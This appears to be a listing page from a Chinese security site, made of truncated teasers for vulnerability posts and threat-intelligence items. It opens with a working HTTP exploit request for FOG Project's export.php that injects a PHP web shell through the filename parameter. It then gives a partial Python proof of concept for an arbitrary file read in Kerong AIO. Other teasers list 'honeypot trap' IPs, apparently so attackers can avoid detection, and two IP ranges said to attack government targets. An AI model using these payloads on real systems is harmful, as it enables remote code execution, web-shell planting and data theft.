fogproject系统接口export.php存在远程命令执行漏洞
POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...
科荣 AIO 管理系统任意文件读取
import base64import requests def poc(ip, file_path): # 构造URL地址url = f’http://{ip}/UtilServlet’headers = { 登录可见余下内容
紫兔渗透测试报告自定义生成器
2025(该版本功能暂定现有 有其他需求可以联系秃兔) + 较其他几个紫兔系列工具增加数据可视化(有点丑) 紫兔渗透测试报告自定义生成器 地址https://www.tutusec.com/report_attack
【2025你懂的】第十四期情报 蜜罐陷阱IP
IP类别地理位置47.119.22.92蜜罐陷阱IP中国 广东 深圳8.130.37.21蜜罐陷阱IP中国 北京39.104.57.33蜜罐陷阱IP中国 北京39.104.59.56蜜罐陷阱IP中国 北京120.79.7.173蜜罐陷阱IP中国 广东 深圳8....
频繁攻击GOV行业的云南俩个c段
20250802162108362.xlsx下载xlsx文件风险信息 180.130.233.0/2414.204.197.0/24 批量扫描网站敏感文件








